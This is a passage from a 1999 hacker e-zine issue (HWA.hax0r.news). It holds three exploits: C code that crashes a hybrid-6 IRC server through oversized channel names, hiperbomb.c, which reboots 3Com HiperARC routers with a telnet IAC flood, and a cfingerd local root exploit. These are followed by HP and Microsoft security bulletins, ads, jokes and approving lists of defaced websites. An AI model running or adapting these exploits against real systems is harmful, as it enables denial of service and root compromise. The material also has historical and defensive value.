* 2. Client B (trivial!trivial@trivial) joins #199chars
* 3. Client A sets mode #199chars +pio Client B
* 4. Client A invites Client C (9chars!10chars@58chars) to #199chars
*
* The code on the invitee's side is done separately.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define SAME 0
#define ERROR -1
#define BUFSIZE 512
#define HOSTLEN 63
#define CHANLEN 200
/* NOTE: This code is not pretty, but tracking 3 clients isn't either. */
struct servstruct {
char *server;
int port;
};
struct servstruct server[2] = {
{ "irc.arpa.com", 6667 },
{ "irc.freei.net", 6667 }
};
char nick[3][10] = {
"clientaaa",
"clientbbb",
"clientccc"
};
int sockfd[2];
char srchost[HOSTLEN+1];
char channel[CHANLEN+1];
char readbuf[BUFSIZE], writebuf[BUFSIZE];
struct sockaddr_in servsin;
/* ---------------------------------------- */
void exploit();
void checkerrors();
void makeconn(int fd, char *nick, char *host, int port);
char *inet_ntoa(struct in_addr in);
int main(int argc, char **argv)
{
register int clients;
struct hostent *hostent;
if (gethostname(srchost, HOSTLEN) == ERROR)
{
fprintf(stderr, "error with gethostname(): %s\n", strerror(errno));
fprintf(stderr, "continuing anyway.. but likely won't work\n");
strcpy(srchost, "UNKNOWN");
}
for (clients = 0; clients < 2; clients++)
{
hostent = gethostbyname(server[clients].server);
if (hostent == NULL)
{
fprintf(stderr, "gethostbyname() error (client %d): ",
clients, strerror(h_errno));
exit(ERROR);
}
servsin.sin_family = AF_INET;
servsin.sin_port = htons(server[clients].port);
memset(&servsin.sin_zero, 0, sizeof(servsin.sin_zero));
memcpy(&servsin.sin_addr, hostent->h_addr, hostent->h_length);
sockfd[clients] = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
makeconn(sockfd[clients], nick[clients],
server[clients].server,
server[clients].port);
}
printf("Calling exploit()..\n");
exploit();
printf("All exploit work has been completed.\n");
for (clients = 0; clients < 3; clients++) close(sockfd[clients]);
return 0;
}
/* connect and login to irc server */
void makeconn(int fd, char *nick, char *host, int port)
{
register int clients;
printf("Connecting to %s (%s) [port %d] as:\n%s!%s@%s\n\n",
host, (char *)inet_ntoa(servsin.sin_addr), port, nick,
"AAAAAAAAAA", srchost);
if (connect(fd, (struct sockaddr *)&servsin,
sizeof(struct sockaddr_in)) == ERROR)
{
fprintf(stderr, "error connecting to %s: %s\n",
host, strerror(errno));
exit(ERROR);
}
memset(readbuf, 0, sizeof(readbuf));
memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "NICK %s\n", nick);
printf("Sending NICK info for %s\n", nick);
if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (%s): %s\n",
nick, strerror(errno));
for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}
snprintf(writebuf, BUFSIZE-1, "USER AAAAAAAAAA none none :w00w00\n");
printf("Sending USER info for %s\n", nick);
if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (%s): %s\n",
nick, strerror(errno));
for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}
sleep(5); /* make sure we give sockbuf enough time to fill up */
if (clients < 2)
{
channel[0] = '#';
memset(channel+1, 'A', CHANLEN-1);
channel[CHANLEN] = '\0';
memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "JOIN %s\n", channel);
printf("\n[%s] /JOIN'ing channel\n", nick);
if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (client %d): %s\n",
clients, strerror(errno));
for (clients = 0; clients < 2; clients++) close(fd);
exit(ERROR);
}
}
printf("\n[Client %d] Checking for login errors...\n", clients);
checkerrors();
printf("[Client %d] Successfuly logged in\n\n", clients);
}
/* check for errors in login */
void checkerrors()
{
char *ptr;
int res = ERROR;
register int clients;
for (clients = 0; clients < 2; clients++)
{
while (res == sizeof(readbuf) - 1)
{
res = recv(sockfd[clients], readbuf, sizeof(readbuf)-1, 0);
if (res == ERROR)
{
fprintf(stderr, "error reading socket (client %d): %s\n",
clients, strerror(errno));
for (clients = 0; clients < 2; clients++)
close(sockfd[clients]);
exit(ERROR);
}
else
{
if (clients == 0)
{
ptr = strstr(readbuf, "hybrid-");
if ((ptr != NULL) && (strncmp(ptr, "hybrid-6", 8) != SAME))
{
fprintf(stderr, "ERROR (client %d): "
"the server must be a hybrid-6 ircd\n",
clients);
for (clients = 0; clients < 2; clients++)
close(sockfd[clients]);
exit(ERROR);
}
}
ptr = strstr(readbuf, ":ERROR");
if (ptr != NULL)
{
fprintf(stderr, "error with irc server (client %d):\n%s\n",
clients, ptr);
for (clients = 0; clients < 3; clients++)
close(sockfd[clients]);
exit(ERROR);
}
}
}
}
}
/* main part of program */
void exploit()
{
register int clients;
memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "MODE %s +ipo %s\n", channel, nick[1]);
printf("%s will now attempt to set channel modes\n", nick[0]);
/* Client A sets modes and ops Client B */
if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send(): %s\n", strerror(errno));
for (clients = 0; clients < 2; clients++) close(clients[sockfd]);
exit(ERROR);
}
sleep(3), checkerrors(); /* check to see if we had a race condition */
printf("\nAttempting to invite %s (the final item)..\n", nick[2]);
memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "INVITE %s %s\n", nick[2], channel);
/* ircd ownage/crash will occur during after this send() */
if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (client %d): %s\n",
clients, strerror(errno));
for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}
/* should have stopped/crashed on server-side by now */
checkerrors();
}
@HWA
74.0 hiperbomb.c - reboot a hiperarc router
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hello,
The attached program will reboot a 3com HiperARC. I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots. This program is effective over all
interfaces, including a dialup.
Regards,
Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapman@1st.net www.1st.net
hiperbomb1.c
/* ---------------------------------------------------------------------
* hiperbomb2.c - Reboots HiperARC faster.
* ---------------------------------------------------------------------
* (c) 1999 - Jonathan Chapman <jchapman@1st.net>
* ---------------------------------------------------------------------
*
Sends a high volume of IACs which eventually leads to a reboot of the
* HiperARC. Brief testing indicated that this problem is most likely
* specific to sending IACs rather than any other type of data. Further
* research has shown that specific IAC patterns are more likely to cause
* a reboot. In this example I use one of the most efficient combinations
* I have discovered. Through my testing it usually required at least
* 60,000 packets to cause the HiperARC to reboot.
* ---------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
char *chassis;
int sockfd, num_of_tries;
void connect_to_chassis(char *name)
{
struct hostent *host;
struct sockaddr_in remote;
host = gethostbyname(name);
if(!host) {
fprintf(stderr, "Cannot resolve host %s.\n", name);
exit(3);
}
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if(sockfd < 0) {
fprintf(stderr, "Cannot obtain descriptor.\n");
exit(4);
}
remote.sin_family = AF_INET;
remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
remote.sin_port = htons(23);
connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));
return;
}
void send_iacs()
{
unsigned char reply[3] = {254, 36, 185};
unsigned int k;
for(k = 0; k < num_of_tries; k++) {
write(sockfd, reply, 3);
}
}
int main(int ac, char **av)
{
if(ac < 3) {
fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
exit(2);
}
chassis = av[1];
num_of_tries = atoi(av[2]);
fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
chassis, num_of_tries);
connect_to_chassis(chassis);
send_iacs();
fprintf(stderr, "Attack complete.\n");
exit(0);
}
@HWA
75.0 HP Security Bulletins Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the HP Electronic Support Center and would
like to be REMOVED from this mailing list, access the
HP Electronic Support Center on the World Wide Web at:
http://europe-support.external.hp.com
Login using your HP Electronic Support Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
Digest Name: Daily Security Bulletins Digest
Created: Thu Aug 12 15:00:02 METDST 1999
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9906-098 Security Vulnerability in VVOS NES
The documents are listed below.
-------------------------------------------------------------------------------
Document ID: HPSBUX9906-098
Date Loaded: 19990811
Title: Security Vulnerability in VVOS NES
---------------------------------------------------------------------------
**REVISED01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00098, 10 June 99
Last Revised: 11 August 1999
---------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: Netscape Enterprise Server cannot correctly process some URL's.
PLATFORM: HP9000 Series 700/800 running:
HP-UX 10.24 (VVOS) with VirtualVault A.02.00
HP-UX 10.24 (VVOS) with VirtualVault A.03.00
HP-UX 10.24 (VVOS) with VirtualVault A.03.01
HP-UX 10.24 (VVOS) with VirtualVault A.03.50
DAMAGE: Web Server cannot correctly process some URLs.
SOLUTION: Apply the appropriate patches to correct the problem:
**REVISED01**
Both HP-UX 10.24 with VirtualVault A.02.00 US/Canada, and
HP-UX 10.24 with VirtualVault A.02.00 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19389 VirtualVault:2.00:NES:NSAPI
Both HP-UX 10.24 with VirtualVault A.03.00 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.00 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19388 VirtualVault:3.00:NES:NSAPI
Both HP-UX 10.24 with VirtualVault A.03.01 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.01 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19387 VirtualVault:3.01:NES:NSAPI
Both HP-UX 10.24 with VirtualVault A.03.50 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.50 International
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19376 VirtualVault:3.50:NES:NSAPI
AVAILABILITY: All patches are available now.
CHANGE SUMMARY: Defects in previous patches discovered.
-----------------------------------------------------------------------
I.
A. Background
A recent bugtraq posting contained some inaccurate information
regarding Hewlett-Packard Company's VirtualVault Operating System.
This problem is not TGA nor TGP related; further, VVOS does not
have a B1 or B2 level of certification.
Under certain conditions, Netscape Enterprise Server (NES)
fails to properly process web requests. This activity has
been observed in the NES bundled with Praesidium VirtualVault
releases A.02.00, A.03.00, A.03.01 and A.03.50.
B. Fixing the problem
This problem can be completely eliminated by applying the
recommended patches mentioned above. It can be resolved
temporarily by commenting out or removing the "vault-auth-log"
AddLog line from the Netscape Enterprise Server's obj.conf file.
Upon patching the system, automatic reboot is performed. The
affected filesets are: VaultNES.NES-VAULT VaultTS.INES-COMMON.
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9906-098--------------------------------
@HWA
76.0 cfingerd exploit
~~~~~~~~~~~~~~~~
Bugtraq Security Advisory
=========================
A serious bug in cfingerd before version 1.4.0 has been reported.
It is present in all versions of cfingerd from 1.2.0 up to any
version of 1.3.2. If configured accordingly this bug enables any
local user to execute random programs with root priviledges.
Although I haven't been quite verbose with development of cfingerd,
Ken Hollis (the original author) has handed maintainership over to
me a while ago. I did some development and fixed some security
related bugs, but never made an official release. This is done now.
Affected systems
----------------
All systems running a version of cfingerd beginning with version
1.2.0 and before version 1.4.0 are affected.
You are safe if you have disabled ALLOW_EXECUTION in your
cfingerd.conf file in section "internal_config", i.e. that file
contains a line "-ALLOW_EXECUTION".
This is the default configuration of this package. If you use the
default cfingerd.conf file as shipped with the distribution you are
safe. You should still upgrade.
Recommended action
------------------
1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf file.
2nd Upgrade to the most recent version of cfingerd 1.4.0 to be found
at the primary site
ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/ or
ftp://metalab.unc.edu/pub/Linux/system/network/finger/ .
Exploit
-------
The exploit is quite simple. Thanks go to Tadek Knapik
<tadek@nautilus.uwoj.krakow.pl> who has informed me.
You need to add
$exec /tmp/relinq
to your ~/.plan file. Then compile the following relinq.c file in
/tmp:
#include <stdio.h>
void main()
{
printf("Root exploit test\n");
setregid(0, 0);
setreuid(0, 0);
printf("User: %d, group: %d.\n", getuid(), getgid());
}
Checksum
--------
File: ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/cfingerd-1.4.0.tar.gz
MD5sum: dcc25e89ba1dad6497365429b1db2909
Regards,
Joey
--
Experience is something you don't get until just after you need it.
@HWA
77.0 Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-028)
--------------------------------------
Patch Available for "Terminal Server Connection Request Flooding"
Vulnerability
Originally Posted: August 09, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability that
could pose a denial-of-service threat to Microsoft(r) Windows NT(r)
Terminal Servers. Frequently asked questions regarding this vulnerability
can be found at http://www.microsoft.com/security/bulletins/MS99-028faq.asp
Issue
=====
When a request to open a new terminal connection is received by a Terminal
Server, the server undertakes a resource-intensive series of operations to
prepare for the connection. It does this before authenticating the request.
This would allow an attacker to mount a denial of service attack by levying
a large number of bogus connection requests and consuming all memory on the
Terminal Server.
This vulnerability could be exploited remotely if connection requests are
not filtered. In extreme cases, the server could crash in the face of such
an attack; in other cases, normal processing would return when the attack
ceased. The patch works by causing the server to require authentication
before processing the connection request.
Affected Software Versions
==========================
- Microsoft Windows NT Server 4.0, Terminal Server Edition
Patch Availability
==================
- Microsoft Windows NT Server 4.0, Terminal Server Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes
/usa/NT40tse/hotfixes-postSP4/Flood-fix/
NOTE: Line breaks have been added to the above URL for readability.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-028: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-028faq.asp.
- Microsoft Knowledge Base (KB) article Q238600,
Multiple Connection Requests Promote Denial of Service Attack,
http://support.microsoft.com/support/kb/articles/q238/6/00.asp.
(Note: It may take 24 hours from the original posting of this
bulletin for the KB article to be visible.)
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft acknowledges the ISS X-force (http://www.iss.net) for discovering
this vulnerability and working with us to alert customers about it.
Revisions
=========
- August 09, 1999: Bulletin Created.
--------------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
O
0
o
O O O
0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
END of main news articles content... read on for ads, humour, hacked websites etc
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............
How many Windows programmers does it take to change a light bulb?
472, one to write WinGetLightBulbHandle, one to write WinQueryStatusLightBulb, one to write WinGetLightSwitchHandle..... How many managers does it take to
change a light bulb?
"We've formed a task force to study the problem and why light bulbs burn out, and figure out what, exactly, we, as supervisors, can do to make the bulbs work
smarter, not harder." How many tech support people does it take to change a light bulb?
"We have an exact copy of the light bulb here and it seems to be working fine.Can you tell me what kind of system you have? Okay, now exactly how dark is it?
Okay, there could be four or five things wrong - have you tried the switch? How many Microsoft technicians does it take to change a light bulb?
Three, two to hold the ladder and one to screw the bulb into the tap. How many Microsoft technicians does it take to change a light bulb?
Eight: one to work the bulb and seven to make sure that Microsoft gets $2 for every light bulb ever changed anywhere in the world. How many Microsoft engineers
does it take to change a light bulb?
None, Bill Gates will just redefine MSDarkness(TM) as the new industry standard. How many Apple employees does it take to change a light bulb?
7, one to change the bulb and six to design the T - Shirt. How many Apple programmers does it take to change a light bulb?
None, the light bulb will be obselete in six months anyway. How many testers does it take to change a light bulb?
We just noticed that it was dark, we don't actually fix the problem. How many developers does it take to change a light bulb?
"The light bulb works fine on the system in my office." How many C++ programmers does it take to change a light bulb?
"Your'e still thinking procedurally. A properly designed light bulb object would inherit a change method from a generic light bulb class, so all you'd have to do is send
a light bulb change message."
.
@HWA
SITE.1 http://sik.kuntz.org/photon/
Pho's page, good info on OS fingerprinting can be found here, page recently updated
with new scanning techniques added...check it out.
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Thursday Rumours;
contributed by Magnum 351
In the last 48 hours numerous underground sites hosted
on free internet sites like Zoom, Tripod, GeoCities,
AngelFire, and others have disappeared. It would appear
that about forty of these sites have been the victim of
anonymous emails to the administrators of these
systems. It is not known who is targeting these sites for
removal but some feel it is the work of one person who
is attempting to remove the competition.
Latest cracked pages courtesy of attrition.org
[99.08.21] NT [HiP] duno.com (members.duno.com)
[99.08.21] So [bl0w team] Small World Software (www.smallworld.com)
[99.08.21] So [mozy] Satelindo (ID)
(www.satelindo.co.id)
[99.08.20] Li [HFH] HAQ (www.haq.nu)
Hacked: http://www.nailed.com
By: doofoo
Mirror: http://www.attrition.org/mirror/attrition/com/www.nailed.com/
OS: FreeBSD
Hacked: http://sgss.com
By: DW
Mirror: http://www.attrition.org/mirror/attrition/com/sgss.com/
OS: NT
*Hacked: http://www.ucam.ac.ma
By: Level Seven
Mirror: http://www.attrition.org/mirror/attrition/ma/www.ucam.ac.ma
OS: Linux
*This is the first Web site to be defaced in the country of Morocco.
Hacked: http://www.ravencomp.ie
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/ie/www.ravencomp.ie/
OS: Irix
Hacked: http://www.ddd.hu
By: 139_r00ted
Mirror: http://www.attrition.org/mirror/attrition/hu/www.ddd.hu
OS: NT
Hacked: http://www.arodnet.com
By: Infinity
Mirror: http://www.attrition.org/mirror/attrition/com/www.arodnet.com/
OS: Solaris
Hacked: http://lanpc11.ilf.dtu.dk
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/dk/lanpc11.ilf.dtu.dk/
OS: NT
#2 Lyrikal (www.lyrikal.com)
Ford Gimsa Automotriz (www.fordgimsa.com.mx)
Distribuidora Monterrey Comisionistas S.A. de C.V.
(www.dimocom.com.mx)
SubmitMaster (www.submitmaster.net)
Illinois Natural History Survey (nuclear.hazard.uiuc.edu)
God Hates Fags (www.godhatesfags.com)
Now TV (www.nowtv.com)
Symbiosis Centre for Management and Human Resource
Development (www.scmhrd.edu)
ABC Network (www.abc.com)
ActiveZone (SG) (www.activezone.com.sg)
Professor J. C. Sprott, Physics, University of Wisconsin
(sprott.physics.wisc.edu)
#2 Spartanburg County Public Libraries (www.spt.lib.sc.us)
#1 Spartanburg County Public Libraries (www.spt.lib.sc.us)
Fat Kid (www.fatkid.net)
FX Interactive (www.fxnetwork.com)
Sky Radio (www.sky-radio.com)
Last Updated: 08/19/99 at 12:15
Professor J. C. Sprott, Physics, University of Wisconsin
(sprott.physics.wisc.edu)
#2 Spartanburg County Public Libraries (www.spt.lib.sc.us)
#1 Spartanburg County Public Libraries (www.spt.lib.sc.us)
Fat Kid (www.fatkid.net)
FX Interactive (www.fxnetwork.com)
Sky Radio (www.sky-radio.com)
Pet Pro (www.pet-pro.com)
NetSouth (www.netsouth.net)
Trousers (www.trousers.org)
SOS (www.s-o-s.org)
Jailed (www.jailed.com)
Iron Dragon (www.iron-dragon.com)
Texas Community Database (www.community.tded.state.tx.us)
Association of Centers for Engineering and Automation
(www.acea.neva.ru)
Vermont Business Assistance Network (www.dca.state.vt.us)
Lebanon High School, New Hampshire (www.lebanon.k12.nh.us)
Hacked: http://www.trousers.org
By: CPW
Mirror: http://www.attrition.org/mirror/attrition/org/www.trousers.org
Hacked: http://www.riddleware.com
By: Dr Nuker of the Pakistan Hacker Club
Mirror: http://www.attrition.org/mirror/attrition/com/www.riddleware.com/
OS: Solaris
Hacked: http://pepita.ead.anl.gov/
By: GEZONDHEID
Mirror: http://www.attrition.org/mirror/attrition/gov/pepita.ead.anl.gov/
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
